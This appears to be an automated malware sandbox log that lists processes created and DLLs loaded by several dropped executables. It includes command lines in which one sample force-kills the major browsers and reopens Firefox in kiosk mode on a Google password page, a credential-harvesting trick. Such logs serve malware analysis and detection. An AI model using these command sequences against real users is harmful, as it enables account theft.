Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d985563cac.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a180dc8-8c9c-4623-9a95-8d8228371a46} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 2739786e510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3380 -parentBuildID 20230927232528 -prefsHandle 4032 -prefMapHandle 1484 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d819197d-ad4a-4ad0-9b0f-25dcec234d88} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 27397886d10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2060,i,10439888162211895715,7665317762376180404,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Section loaded: userenv.dll
